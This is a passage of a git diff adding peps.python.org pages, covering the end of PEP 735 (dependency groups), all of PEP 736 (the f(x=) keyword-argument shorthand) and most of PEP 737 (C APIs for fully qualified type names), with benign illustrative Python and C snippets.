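import tomllib
+
+def expand_group(groups, name, _seen=None):
+    # Expand one [dependency-groups] entry into a flat list of PEP 508
+    # requirement strings, following Dependency Group Includes recursively.
+    _seen = set() if _seen is None else _seen
+    if name in _seen:
+        raise ValueError(f"include-group cycle at {name!r}")
+    _seen.add(name)
+    requirements = []
+    for item in groups[name]:
+        if isinstance(item, dict):            # {"include-group": "other"}
+            requirements += expand_group(groups, item["include-group"], _seen)
+        else:                                 # a plain requirement string
+            requirements.append(item)
+    return requirements
+
+with open("pyproject.toml", "rb") as f:
+    groups = tomllib.load(f)["dependency-groups"]
+print(expand_group(groups, "typing"))
+
+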

+

In order for Dependency Groups to be a viable alternative for users of +environment managers, the environment managers will need to support processing +Dependency Groups similarly to how they support inline dependency declaration.

+
+
+

IDE and Editor Use of Requirements Data

+

IDE and editor integrations may benefit from conventional or configurable names +for the Dependency Groups they integrate with.

+

There are at least two known scenarios in which it is valuable for an editor or +IDE to be capable of discovering the non-published dependencies of a project:

+
    +
  • testing: IDEs such as VS Code support GUI interfaces for running particular +tests
  • +
  • linting: editors and IDEs often support linting and autoformatting +integrations which highlight or autocorrect errors
  • +
+

These cases could be handled by defining conventional group names like +test, lint, and fix, or by defining configuration mechanisms which +allow the selection of Dependency Groups.

+

For example, the following pyproject.toml declares the three aforementioned +groups:

+
[dependency-groups]
+test = ["pytest", "pytest-timeout"]
+lint = ["flake8", "mypy"]
+fix = ["black", "isort", "pyupgrade"]
+
+
+

This PEP makes no attempt to standardize such names or reserve them for such +uses. IDEs may standardize or may allow users to configure the group names used +for various purposes.

+

This declaration allows the project author’s knowledge of the appropriate tools +for the project to be shared with all editors of that project.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0735.rst

+

Last modified: 2024-10-16 16:05:18 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0736/index.html b/pep-0736/index.html new file mode 100644 index 00000000000..80ac508cf25 --- /dev/null +++ b/pep-0736/index.html @@ -0,0 +1,745 @@ + + PEP 736 – Shorthand syntax for keyword arguments at invocation | peps.python.org + +
+
+


+ + +
+
+
+

PEP 736 – Shorthand syntax for keyword arguments at invocation

+
+
Author:
+
Joshua Bambrick <jbambrick at google.com>, +Chris Angelico <rosuav at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
28-Nov-2023
+
Python-Version:
+
3.14
+
Post-History:
+
14-Oct-2023, +17-Jan-2024, +17-Jul-2024
+
+
+
+
+
+

Abstract

+

This PEP proposes to introduce syntactic sugar f(x=) for the common pattern +where a keyword argument has the same name as the variable supplying its value, +as in f(x=x).

+
+
+

Motivation

+

Keyword argument syntax can become needlessly repetitive and verbose.

+

Consider the following call:

+
my_function(
+  my_first_variable=my_first_variable,
+  my_second_variable=my_second_variable,
+  my_third_variable=my_third_variable,
+)
+
+
+

The case of a keyword argument name matching the variable name of its value is +prevalent among Python libraries. This redundancy discourages use of named +arguments and reduces readability by increasing visual noise.

+
+
+

Rationale

+

There are two ways to invoke a function with arguments: by position and by +keyword. By being explicit, keyword arguments increase readability and +minimise the risk of inadvertent transposition. On the flipside, positional +arguments are often preferred simply to minimise verbosity and visual noise.

+

We contend that a simple syntactic sugar used to simplify this common pattern +would confer numerous benefits:

+
+

Encourages use of named arguments

+

By reducing the visual noise that established keyword argument syntax can cause, +this syntax would encourage the use of named arguments, thereby increasing +readability and reducing bugs from argument transposition.

+
+
+

Reduces verbosity

+

By minimising visual noise and in some cases lines of code, we can increase +readability.

+
+
+

Encourages consistent variable names

+

A common problem is that semantically identical variables have different names +depending on their contexts. This syntax would encourage authors to give a variable +the same name as the argument it is passed to, which would increase the +consistency of variable names and hence improve readability.

+
+
+

Highlights arguments not following this pattern

+

With the current syntax, function calls where many arguments are forwarded from +the local context can make other argument values easy to miss due to the visual +noise. For example:

+
add_middleware(
+    excluded_urls=excluded_urls,
+    server_request=server_request,
+    client_request=client_request,
+    client_response=client_response,
+    span_details=_get_span_details(),
+    tracer=tracer,
+    meter=meter,
+)
+
+
+

With this syntax, the exceptional arguments become easier to identify:

+
add_middleware(
+    excluded_urls=,
+    server_request=,
+    client_request=,
+    client_response=,
+    span_details=_get_span_details(),
+    tracer=,
+    meter=,
+)
+
+
+
+
+

Applicability to dictionary construction

+

This syntax can be applied to dictionary construction where a similar pattern +frequently occurs (where dictionary keys are identical to the names of the +variables assigned as their values), {"x": x, "y": y} or dict(x=x, y=y). +With this feature, this can now also be trivially written as dict(x=, y=). +Whether to further support similar syntax in dictionary literals is an open +question beyond the scope of this PEP.
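
+

The existing equivalence is easy to verify today; under this proposal, dict(x=, y=) would simply be sugar for the same expression:

+
x, y = 1, 2
+assert {"x": x, "y": y} == dict(x=x, y=y) == {"x": 1, "y": 2}
+# Under this proposal, dict(x=, y=) would be sugar for dict(x=x, y=y).
+
+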

+
+
+
+

Specification

+

We propose to introduce syntactic sugar such that, if the value of a keyword +argument is omitted from a function invocation, the argument’s value is inferred +to be the variable matching that name at the invocation scope.

+

For example, the function invocation:

+
my_function(my_first_variable=, my_second_variable=, my_third_variable=)
+
+
+

Will be interpreted exactly equivalently to the following in existing syntax:

+
my_function(
+  my_first_variable=my_first_variable,
+  my_second_variable=my_second_variable,
+  my_third_variable=my_third_variable,
+)
+
+
+

If no variable matches that name in the invocation scope, a NameError is +raised, exactly as it would be with the established expanded syntax.
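
+

That behaviour can be previewed today with the expanded form, since the two are defined to be identical:

+
def greet(name="world"):
+    print(f"Hello, {name}!")
+
+greet(name=name)  # NameError: name 'name' is not defined
+# Under this proposal, greet(name=) would raise the same NameError here,
+# because no variable called "name" exists in the calling scope.
+
+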

+

This proposal only pertains to function invocations; function definitions are +unaffected by the syntax change. All existing valid syntax is unchanged.

+
+
+

Backwards Compatibility

+

Only new syntax is added which was previously syntactically erroneous. No +existing valid syntax is modified. As such, the changes proposed are fully +backwards compatible.

+
+
+

Security Implications

+

There are no security implications for this change.

+
+
+

Prior Art

+

Python already possesses a very similar feature in f-string interpolation where +f'{x=}' is effectively expanded to f'x={x}' (see +related GitHub issue).
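
+

A quick demonstration of that existing behaviour:

+
x = 42
+print(f"{x=}")   # prints: x=42
+print(f"x={x}")  # equivalent expansion, prints: x=42
+
+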

+

Several modern languages provide similar features during function invocation, +sometimes referred to as ‘punning’. For example:

+ +

Beyond function invocation specifically, more languages offer similar features:

+ +
+
+

Applicability

+

We analysed popular Python libraries from the last few years using +this script +to compute:

+
    +
  • The number of keyword arguments which were of the form f(x=x) at +invocation.
  • +
  • The percentage of keyword arguments which had the form f(x=x) at +invocation.
  • +
  • The number of lines of code which could be saved by using this syntactic sugar +to reduce the need for line wraps.
  • +
+

The purpose of this exercise was to compute statistics about the prevalence of +this pattern and should not be interpreted as a recommendation that the proposed +syntactic sugar should be applied universally.
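
+

The linked script is not reproduced here, but a minimal sketch of its core counting logic, using only the standard library ast module, might look like this (the function name is ours):

+
import ast
+
+def count_shorthand_candidates(source):
+    # Count keyword arguments of the form f(x=x) against all keyword
+    # arguments, over every call expression in the given source code.
+    matching = total = 0
+    for node in ast.walk(ast.parse(source)):
+        if isinstance(node, ast.Call):
+            for kw in node.keywords:
+                if kw.arg is None:  # a **kwargs expansion, not x=...
+                    continue
+                total += 1
+                if isinstance(kw.value, ast.Name) and kw.value.id == kw.arg:
+                    matching += 1
+    return matching, total
+
+print(count_shorthand_candidates("f(a, x=x, y=1, **kw)"))  # (1, 2)
+
+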

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
StatisticPolarsFastAPIRichHTTPX
Number of keyword arguments of the form f(x=x) at invocation1,6541,408566759
Percentage of keyword arguments of the form f(x=x) at invocation15.83%28.11%15.74%45.13%
Lines saved1703562117
+

Based on this, we note that the f(x=x) keyword argument pattern is +widespread, accounting for anywhere from 15% to just below half of all keyword +argument uses depending on the codebase.

+
+
+

Proposed Syntax

+

While this feature has been proposed on numerous occasions with several +different forms [1] [2] [3] [4] [5] [6], we have opted to advocate +for the f(x=) form for the following reasons:

+
    +
  • This feature has been proposed frequently over a ten-year period, with +f(x=) or f(=x) being by far the most commonly suggested syntaxes [1] +[2] [6]. This strongly indicates that they are the most obvious notations.
  • +
  • The proposed syntax closely matches the f-string debug f'{var=}' syntax +(established Pythonic style) and serves an almost identical purpose.
  • +
  • The proposed syntax is exactly analogous to the Ruby keyword argument +syntactic sugar. See the +Ruby 3.1.0 release notes (search for “keyword arguments”).
  • +
  • The syntax is easy to implement as it is simple syntactic sugar.
  • +
  • When compared to the prefix form (see Rejected Ideas), this syntax +communicates “here is a parameter, go find its argument” which is more +appropriate given the semantics of named arguments.
  • +
  • A poll of Python developers +indicates that this is the most popular syntax among those proposed.
  • +
+
+
+

How to Teach This

+

To ease the communication of and search for this feature, it may also be +valuable to provide this feature with a name, such as ‘keyword argument +shorthand’.

+

Keen Python developers will likely hear about this feature through typical +information channels, such as newsboards, social media, mailing lists, online +forums, or word of mouth. Many more will encounter this feature while reading +code and noting the omission of the value in a keyword argument at invocation, +violating their expectations. We should ensure such developers have easy access +to documentation that explains the semantics of this feature and that this +documentation is easy to find when searching. For example, the +Python Glossary and +Tutorial +may be updated accordingly and reasonable keywords may be used to help with +search discoverability. +A StackOverflow question +could be written to help explain this feature to those searching for an +explanation.

+

A teacher may explain this feature to new Python programmers as, “where you see +an argument followed only by an equals sign, such as f(x=), this represents +a keyword argument where the name of the argument and its value are the same. +This can be written equivalently in the expanded notation, f(x=x).” +Depending on a student’s background, a teacher might further compare this to +equivalent syntax in other languages or to Python’s f-string syntax f"{x=}".

+

To understand this, a student of Python would need to be familiar with the +basics of functions in addition to the existing keyword argument syntax. +Given that this feature is a relatively straightforward syntactic sugar, it is +reasonable that a student who possesses a grasp of keyword arguments will be +able to absorb this concept quickly. This is evidenced by the success of the +f-string syntax as well as similar features in other languages (see +Prior Art).

+
+
+

Rejected Ideas

+

Many alternative syntaxes have been proposed; however, no form other than +f(=x) or f(x=) has garnered significant support. Here we enumerate some +of the most popular proposed alternatives and explain why we ultimately reject them.

+
+

f(a, b, *, x)

+

On a few occasions the idea has been floated to borrow the syntax from +keyword-only function definitions.

+

In favour of this proposal:

+
    +
  • This syntax is familiar from its use to require keyword-only arguments in +function definitions.
  • +
  • A poll of Python developers +indicates that this is the second most popular syntax among those proposed.
  • +
+

However, we object that:

+
    +
  • For any given argument, it is less clear from local context whether it is +positional or named. The * could easily be missed in a long argument list +and named arguments may be read as positional or vice versa.
  • +
  • It is unclear whether keyword arguments for which the value was not elided may +follow the *. If so, then their relative position will be confusingly +arbitrary, but if not, then an arbitrary grouping is enforced between +different types of keyword arguments and reordering of arguments would be +necessary if only one name (the argument or its value) was changed.
  • +
  • The use of * in function calls is well established and this proposal would +introduce a new effect which could cause confusion. For example, +f(a, *x, y) would mean something different than f(a, *, x, y).
  • +
+
+
+

f(=x)

+

In favour of this form:

+
    +
  • The prefix operator is more similar to the established *args and +**kwargs syntax for function calls.
  • +
  • It draws more attention to itself when arguments are arranged vertically. In +particular, if the arguments are of different lengths it is harder to find the +equals sign at the end. Moreover, since Python is read left to right, the use +of this feature is clearer to the reader earlier on.
  • +
+

On the contrary:

+
    +
  • While the prefix version is visually louder, in practice, there is no need for +this feature to shout its presence any more than a typical named argument. By +the time we read to the = it is clear that the value is filled in +automatically just as the value is clear in the typical keyword argument case.
  • +
  • Semantically, this form communicates ‘here is a value, fill in the parameter’ +which is not what we want to convey.
  • +
  • It is less similar to f-string syntax.
  • +
  • It is less obvious that arbitrary expressions are invalid, for example, +f(=a + b), since such expressions are acceptable after the equals sign in +the current keyword argument syntax but not before it.
  • +
+
+
+

f(%x) or f(:x) or f(.x)

+

Several flavours of this syntax have been proposed with the prefix form +substituting another character for =. However, no such form has gained +traction and the choice of symbol seems arbitrary compared to =. +Additionally, there is less precedent in terms of existing language features +(such as f-string) or other languages (such as Ruby).

+
+
+
+

Objections

+

There are only a few hard objections to the introduction of this syntactic +sugar. Most of those not in favour of this feature are in the camp of ‘I +wouldn’t use it’. However, over the extensive conversations about this feature, +the following objections were the most common:

+
+

The syntax is ugly

+

This objection is the most common. On the contrary, we argue that:

+
    +
  • This objection is subjective and many community members disagree.
  • +
  • A nearly-identical syntax is already established for f-strings.
  • +
  • Programmers will, as ever, adjust over time.
  • +
+
+
+

The feature is confusing

+

We argue that:

+
    +
  • Introducing new features typically has this impact temporarily.
  • +
  • The syntax is very similar to the established f'{x=}' syntax.
  • +
  • The feature and syntax are familiar from other popular modern languages.
  • +
  • The expansion of x= to x=x is a trivial feature and inherently +significantly less complex than the popular *arg and **kwarg +expansions.
  • +
  • This particular syntactic form has been independently proposed on numerous +occasions, indicating that it is the most obvious [1] [2] [6].
  • +
+
+
+

The feature is not explicit

+

We recognise that, in an obvious sense, the argument value is ‘implicit’ in this +proposed syntax. However, we do not think that this is what the Zen of Python is +aiming to discourage.

+

In the sense that we take the Zen to be referring to, keyword arguments (for +example) are more explicit than positional arguments where the argument name is +omitted and impossible to tell from the local context. Conversely, the syntactic +sugar for integers x += 1 is not more implicit than x = x + 1 in this +sense, even though the variable is omitted from the right hand side, because it +is immediately obvious from the local context what it is.

+

The syntax proposed in this PEP is much more closely analogous to the x += 1 +example (although simpler since we do not propose to introduce a new operation). +Moreover, by removing the barrier of visual noise introduced by the existing +keyword argument syntax, this syntactic sugar will encourage the use of keyword +arguments over positional ones, making typical Python codebases more explicit in +general.

+
+
+

The feature adds another way of doing things

+

The same argument can be made against all syntax changes. This is a simple +syntactic sugar, much as x += 1 is sugar for x = x + 1 when x is an +integer. This isn’t tantamount to a ‘new way’ of passing arguments but a more +readable notation for the same way.

+
+
+

Renaming the variable in the calling context will break the code

+

A NameError would make the mistake clear in the large majority of cases. There +may be confusion if a variable from a broader scope has the same name as the +original variable, in which case no NameError would be raised. However, this issue can +also occur with keyword arguments using the current syntax (although arguably, +this syntactic sugar could make it harder to spot). Moreover, having variables +with the same name in different scopes is broadly considered to be bad practice +and is discouraged by linters.

+

Code editors could highlight the issue based on static analysis – f(x=) is +exactly equivalent to writing f(x=x). If x does not exist, modern +editors have no problem highlighting the issue.

+
+
+

This syntax increases coupling

+

We recognise that, as ever, all syntax has the potential for misuse and so +should be applied judiciously to improve codebases. In this case, if a parameter +and its value have the same semantics in both contexts, that suggests that using +this syntax is appropriate and will help ameliorate the risk of unintentional +desynchronisation which harms readability.

+

However, if the two variables have different semantics, that suggests that this +feature should not be used (since it encourages consistency) or perhaps that one +or both of the variables should be renamed.

+
+
+
+

Recommendations for Using This Syntax

+

As with any other language feature, the programmer should exercise their own +judgement about whether it is prudent to use it in any given context. We do not +recommend enforcing a rule to use the feature in all cases where it may be +applicable, such as via lint rules or style guides.

+

As described in This syntax increases coupling, we propose that a reasonable +rule of thumb would be to use this in cases where a parameter and its argument +have the same semantics in order to reduce unintentional desynchronisation +without causing inappropriate coupling.

+
+
+

Impact on Editing

+
+

Using a plain text editor

+

Editing with a plain text editor should generally be unaffected.

+

When renaming a variable using a ‘Find-Replace’ method, where this syntax is +used the developer will come across the function argument at invocation (as they +would if this syntax was not used). At that point, they can, as usual, decide +whether to update the argument as well or expand to the full f(x=x) syntax.

+

As with the current syntax, a ‘Find-Replace All’ method would fail since the +keyword argument would not exist at function definition, in the vast majority +of cases.

+

If the developer leaves the argument name unchanged and forgets to update its +value, a NameError will typically be raised as described in +Renaming the variable in the calling context will break the code.

+
+
+

Proposals for IDEs

+

In response to community feedback, we include some suggestions regarding how +IDEs could handle this syntax. However, we defer to the domain experts +developing IDEs to use their discretion.

+

Most considerations are made simple by recognising that f(x=) is just +syntactic sugar for f(x=x) and should be treated the same as at present.

+
+

Highlighting NameErrors

+

IDEs typically offer a feature to highlight code that may cause a NameError. +We recommend that this syntax be treated similarly to the expanded form +f(x=x) to identify and highlight cases where the elided variable may not +exist. What visual cue may be used to highlight these cases may be the same or +different from that which would be used with the current syntax, depending on +the IDE.

+
+
+

Jump to definition

+

There are a few possible ways that a ‘jump to definition’ feature could be +implemented depending on the caret/cursor position.

+

One option is to:

+
    +
  • Jump to the argument in the function definition if the caret/cursor is on the +argument
  • +
  • Jump to the definition of the elided variable if the caret/cursor is on the +character following the = in our proposed syntax
  • +
+

Another, potentially complementary, option would be to expand the syntax +visually on mouseover and enable a Ctrl+Click (or Cmd+Click) to the +definition of the variable.

+
+
+

Highlighting other references

+

IDEs frequently highlight matching code references to the value at the current +caret/cursor position. With this shorthand syntax, when the caret/cursor is on +the argument name it may be valuable to either:

+
    +
  • Highlight both references to the argument and its value reflecting the fact +that this name now refers to both
  • +
  • Visually expand the syntax on mouseover (as above) and apply established +highlighting logic according to the cursor
  • +
+
+
+

Rename symbol

+

There are a few ways that IDEs may wish to support a ‘Rename symbol’ feature for +this syntax. For example, if the argument is being renamed, the IDE may:

+
    +
  • Also rename the variable used as its value in each calling context where this +syntax is used
  • +
  • Expand to use the full syntax to pass the unchanged variable as the value of +the renamed argument
  • +
  • Prompt the developer to select between the two above options
  • +
+

The last option seems to be the most preferable to reduce unintentional +desynchronisation of names while highlighting the changes to the programmer.

+
+
+
+
+

Reference Implementation

+

A proposed implementation +for CPython has been provided by @Hels15. We will extend this implementation to +add an AST node attribute indicating for keywords whether the value was elided. +Otherwise the AST will remain unchanged.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0736.rst

+

Last modified: 2024-12-06 14:12:05 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0737/index.html b/pep-0737/index.html new file mode 100644 index 00000000000..1b951c97468 --- /dev/null +++ b/pep-0737/index.html @@ -0,0 +1,698 @@ + + PEP 737 – C API to format a type fully qualified name | peps.python.org + +
+
+


+ + +
+
+
+

PEP 737 – C API to format a type fully qualified name

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
29-Nov-2023
+
Python-Version:
+
3.13
+
Post-History:
+
29-Nov-2023
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Abstract

+

Add new convenient C APIs to format a type fully qualified name. No longer +format type names differently depending on how types are implemented.

+

Recommend using the type fully qualified name in error messages and in +__repr__() methods in new C code. Recommend not truncating type +names in new C code.

+

Add %T, %#T, %N and %#N formats to +PyUnicode_FromFormat() to format the fully qualified name, respectively, +of an object type and of a type.

+

Make C code safer by avoiding borrowed references, which can lead to +crashes. The new C API is compatible with the limited C API.

+
+
+

Rationale

+
+

Standard library

+

In the Python standard library, formatting a type name or the type name +of an object is a common operation to format an error message and to +implement a __repr__() method. There are different ways to format a +type name which give different outputs.

+

Example with the datetime.timedelta type:

+
    +
  • The type short name (type.__name__) and the type qualified name +(type.__qualname__) are 'timedelta'.
  • +
  • The type module (type.__module__) is 'datetime'.
  • +
  • The type fully qualified name is 'datetime.timedelta'.
  • +
  • The type representation (repr(type)) contains the fully qualified +name: <class 'datetime.timedelta'>.
  • +
+
+

Python code

+

In Python, type.__name__ gets the type short name, whereas +f"{type.__module__}.{type.__qualname__}" formats the type “fully +qualified name”. Usually, type(obj) or obj.__class__ are used to +get the type of the object obj. Sometimes, the type name is put +between quotes.

+

Examples:

+
    +
  • raise TypeError("str expected, not %s" % type(value).__name__)
  • +
  • raise TypeError("can't serialize %s" % self.__class__.__name__)
  • +
  • name = "%s.%s" % (obj.__module__, obj.__qualname__)
  • +
+

Qualified names were added to types (type.__qualname__) in Python +3.3 by PEP 3155 “Qualified name for classes and functions”.
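
+

These attributes can be inspected directly; using the datetime.timedelta example from above:

+
import datetime
+
+t = datetime.timedelta
+print(t.__name__)                          # timedelta
+print(t.__qualname__)                      # timedelta
+print(t.__module__)                        # datetime
+print(f"{t.__module__}.{t.__qualname__}")  # datetime.timedelta
+print(repr(t))                             # <class 'datetime.timedelta'>
+
+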

+
+
+

C code

+

In C, the most common way to format a type name is to get the +PyTypeObject.tp_name member of the type. Example:

+
PyErr_Format(PyExc_TypeError, "globals must be a dict, not %.100s",
+             Py_TYPE(globals)->tp_name);
+
+
+

The type “fully qualified name” is used in a few places: +PyErr_Display(), type.__repr__() implementation, and +sys.unraisablehook implementation.

+

Using Py_TYPE(obj)->tp_name is preferred since it is more convenient +than calling PyType_GetQualName() which requires Py_DECREF(). +Moreover, PyType_GetQualName() was only added recently, in Python +3.11.

+

Some functions use %R (repr(type)) to format a type name, the +output contains the type fully qualified name. Example:

+
PyErr_Format(PyExc_TypeError,
+             "calling %R should have returned an instance "
+             "of BaseException, not %R",
+             type, Py_TYPE(value));
+
+
+
+
+
+

Using PyTypeObject.tp_name is inconsistent with Python

+

The PyTypeObject.tp_name member is different depending on the type +implementation:

+
    +
  • Static types and heap types in C: tp_name is the type fully +qualified name.
  • +
  • Python class: tp_name is the type short name (type.__name__).
  • +
+

So using Py_TYPE(obj)->tp_name to format an object type name gives +a different output depending on whether a type is implemented in C or in Python.

+

It goes against the principles of PEP 399 “Pure Python/C Accelerator Module +Compatibility Requirements”, which recommends that code behave +the same way whether written in Python or in C.

+

Example:

+
$ python3.12
+>>> import _datetime; c_obj = _datetime.date(1970, 1, 1)
+>>> import _pydatetime; py_obj = _pydatetime.date(1970, 1, 1)
+>>> my_list = list(range(3))
+
+>>> my_list[c_obj]  # C type
+TypeError: list indices must be integers or slices, not datetime.date
+
+>>> my_list[py_obj]  # Python type
+TypeError: list indices must be integers or slices, not date
+
+
+

The error message contains the type fully qualified name +(datetime.date) if the type is implemented in C, or the type short +name (date) if the type is implemented in Python.

+
+
+

Limited C API

+

The Py_TYPE(obj)->tp_name code cannot be used with the limited C +API, since the PyTypeObject members are excluded from the limited C +API.

+

The type name should be read using the PyType_GetName(), +PyType_GetQualName() and PyType_GetModule() functions, which are +less convenient to use.

+
+
+

Truncating type names in C

+

In 1998, when the PyErr_Format() function was added, the +implementation used a fixed buffer of 500 bytes. The function had the +following comment:

+
/* Caller is responsible for limiting the format */
+
+
+

In 2001, the function was modified to allocate a dynamic buffer on the +heap. By then, however, the practice of truncating type names, such as using the +%.100s format, had already become a habit, and developers forgot why +type names were truncated. In Python, type names are not truncated.

+

Truncating type names in C but not in Python goes against the principles of PEP 399 +“Pure Python/C Accelerator Module Compatibility Requirements”, +which recommends that code behave the same way whether written in Python or in +C.

+

See the issue: Replace %.100s by %s in PyErr_Format(): the arbitrary +limit of 500 bytes is outdated (2011).

+
+
+
+

Specification

+
    +
  • Add PyType_GetFullyQualifiedName() function.
  • +
  • Add PyType_GetModuleName() function.
  • +
  • Add formats to PyUnicode_FromFormat().
  • +
  • Recommend using the type fully qualified name in error messages and +in __repr__() methods in new C code.
  • +
  • Recommend not truncating type names in new C code.
  • +
+
+

Add PyType_GetFullyQualifiedName() function

+

Add the PyType_GetFullyQualifiedName() function to get the fully +qualified name of a type: similar to +f"{type.__module__}.{type.__qualname__}", or type.__qualname__ +if type.__module__ is not a string, or is equal to "builtins" or +"__main__".

+

API:

+
PyObject* PyType_GetFullyQualifiedName(PyTypeObject *type)
+
+
+

On success, return a new reference to the string. On error, raise an +exception and return NULL.
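
+

In pure Python, the naming rule described above corresponds roughly to the following sketch (the function is illustrative, not part of the proposed API):

+
def fully_qualified_name(tp):
+    # Mirror of the proposed C-level rule: omit the module when it is
+    # missing, not a string, "builtins", or "__main__".
+    module = getattr(tp, "__module__", None)
+    if not isinstance(module, str) or module in ("builtins", "__main__"):
+        return tp.__qualname__
+    return f"{module}.{tp.__qualname__}"
+
+import datetime
+print(fully_qualified_name(datetime.timedelta))  # datetime.timedelta
+print(fully_qualified_name(int))                 # int
+
+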

+
+
+

Add PyType_GetModuleName() function

+

Add the PyType_GetModuleName() function to get the module name of a +type (type.__module__ string). API:

+
PyObject* PyType_GetModuleName(PyTypeObject *type)
+
+
+

On success, return a new reference to the string. On error, raise an +exception and return NULL.

+
+
+

Add formats to PyUnicode_FromFormat()

+

Add the following formats to PyUnicode_FromFormat():

+
    +
  • %N formats the fully qualified name of a type, +similar to PyType_GetFullyQualifiedName(type); +N stands for type Name.
  • +
  • %T formats the fully qualified name of an object’s type, +similar to PyType_GetFullyQualifiedName(Py_TYPE(obj)); +T stands for object Type.
  • +
  • %#N and %#T: the alternative form uses the colon separator +(:), instead of the dot separator (.), between the module name +and the qualified name.
  • +
+

For example, the existing code using tp_name:

+
PyErr_Format(PyExc_TypeError,
+             "__format__ must return a str, not %.200s",
+             Py_TYPE(result)->tp_name);
+
+
+

can be replaced with the %T format:

+
PyErr_Format(PyExc_TypeError,
+             "__format__ must return a str, not %T", result);
+
+
+

Advantages of the updated code:

+
    +
  • Safer C code: avoid Py_TYPE() which returns a borrowed reference.
  • +
  • The PyTypeObject.tp_name member is no longer read explicitly: the +code becomes compatible with the limited C API.
  • +
  • The formatted type name no longer depends on the type implementation.
  • +
  • The type name is no longer truncated.
  • +
+

Note: The %T format is used by time.strftime(), but not by +printf().

+
+
+

Formats Summary

+ + + + + + + + + + + + + + + + + +
C objectC typeFormat
%T%NType fully qualified name.
%#T%#NType fully qualified name, colon separator.
+
+
+

Recommend using the type fully qualified name

+

The type fully qualified name is recommended in error messages and in +__repr__() methods in new C code.

+

In non-trivial applications, it is likely that two types with the +same short name will be defined in two different modules, especially with +generic names. Using the fully qualified name helps identify the type +in an unambiguous way.

+
+
+

Recommend not truncating type names

+

Type names should not be truncated in new C code. For example, the +%.100s format should be avoided: use the %s format instead (or +%T format in C).

+
+
+
+

Implementation

+ +
+
+

Backwards Compatibility

+

Changes proposed in this PEP are backward compatible.

+

Adding new C APIs has no effect on the backward compatibility. Existing +C APIs are left unchanged. No Python API is changed.

+

Replacing the type short name with the type fully qualified name is only +recommended in new C code. No longer truncating type names is only +recommended in new C code. Existing code should be left unchanged and so +remains backward compatible. There is no recommendation for Python code.

+
+
+

Rejected Ideas

+
+

Add type.__fully_qualified_name__ attribute

+

Add type.__fully_qualified_name__ read-only attribute, the fully +qualified name of a type: similar to +f"{type.__module__}.{type.__qualname__}", or type.__qualname__ if +type.__module__ is not a string or is equal to "builtins" or is +equal to "__main__".

+

The type.__repr__() implementation is left unchanged; it only omits the module if +the module is equal to "builtins".

+

This change was rejected by the Steering Council:

+
+
We can see the usefulness of the C API changes proposed by the PEP +and would likely accept those changes as is.

We see less justification for the Python level changes. We +especially question the need for __fully_qualified_name__.

+
+

Thomas Wouters added:

+
+
If there really is a desire for formatting types the exact same way +the C API does it, a utility function would make more sense to me, +personally, than type.__format__, but I think the SC could be +persuaded given some concrete use-cases.
+
+
+

Add type.__format__() method

+

Add type.__format__() method with the following formats:

+
    +
  • N formats the type fully qualified name +(type.__fully_qualified_name__); +N stands for Name.
  • +
  • #N (alternative form) formats the type fully qualified name +using the colon (:) separator, instead of the dot separator +(.), between the module name and the qualified name.
  • +
+

Examples using f-string:

+
>>> import datetime
+>>> f"{datetime.timedelta:N}"  # fully qualified name
+'datetime.timedelta'
+>>> f"{datetime.timedelta:#N}" # fully qualified name, colon separator
+'datetime:timedelta'
+
+
+

The colon (:) separator used by the #N format eliminates +guesswork when you want to import the name, see +pkgutil.resolve_name(), python -m inspect command line +interface, and setuptools entry points.

+

This change was rejected by the Steering Council.

+
+
+

Change str(type)

+

The type.__str__() method can be modified to format a type name +differently. For example, it can return the type fully qualified name.

+

The problem is that it’s a backward incompatible change. For example, the +enum, functools, optparse, pdb and xmlrpc.server +modules of the standard library would have to be updated. The +test_dataclasses, test_descrtut and test_cmd_line_script +tests would have to be updated as well.

+

See the pull request: str(type) returns the fully qualified name.

+
+
+

Add !t formatter to get an object type

+

Use f"{obj!t:T}" to format type(obj).__fully_qualified_name__, +similar to f"{type(obj):T}".

+

When the !t formatter was proposed in 2018, Eric Smith was strongly +opposed to this; +Eric is the author of the f-string PEP 498 “Literal String Interpolation”.

+
+
+

Add formats to str % args

+

It was proposed to add formats to format a type name in str % arg. +For example, add the %T format to format a type fully qualified +name.

+

Nowadays, f-strings are preferred for new code.

+
+
+

Other ways to format type names in C

+

The printf() function supports multiple size modifiers: hh +(char), h (short), l (long), ll (long long), +z (size_t), t (ptrdiff_t) and j (intmax_t). +The PyUnicode_FromFormat() function supports most of them.

+

Proposed formats using h and hh length modifiers:

+
    +
  • %hhT formats type.__name__.
  • +
  • %hT formats type.__qualname__.
  • +
  • %T formats type.__fully_qualified_name__.
  • +
+

Length modifiers are used to specify the C type of the argument, not to +change how an argument is formatted. The alternate form (#) changes +how an argument is formatted. Here the argument C type is always +PyObject*.

+

Other proposed formats:

+
    +
  • %Q
  • +
  • %t.
  • +
  • %lT formats type.__fully_qualified_name__.
  • +
  • %Tn formats type.__name__.
  • +
  • %Tq formats type.__qualname__.
  • +
  • %Tf formats type.__fully_qualified_name__.
  • +
+

Having more options to format type names can lead to inconsistencies +between different modules and make the API more error prone.

+

As for the %t format: printf() already uses t as a length +modifier for ptrdiff_t arguments.

+

The following APIs can be used to format a type:

+ + + + + + + + + + + + + + + + + + + + + +
C APIPython APIFormat
PyType_GetName()type.__name__Type short name.
PyType_GetQualName()type.__qualname__Type qualified name.
PyType_GetModuleName()type.__module__Type module name.
+
+
+

Use %T format with Py_TYPE(): pass a type

+

It was proposed to pass a type to the %T format, like:

+
PyErr_Format(PyExc_TypeError, "object type name: %T", Py_TYPE(obj));
+
+
+

The Py_TYPE() function returns a borrowed reference. Just to format +an error, using a borrowed reference to a type looks safe. In practice, +it can lead to a crash. Example:

+
import gc
+import my_cext
+
+class ClassA:
+    pass
+
+def create_object():
+     class ClassB:
+          def __repr__(self):
+                self.__class__ = ClassA
+                gc.collect()
+                return "ClassB repr"
+     return ClassB()
+
+obj = create_object()
+my_cext.func(obj)
+
+
+

where my_cext.func() is a C function which calls:

+
PyErr_Format(PyExc_ValueError,
+             "Unexpected value %R of type %T",
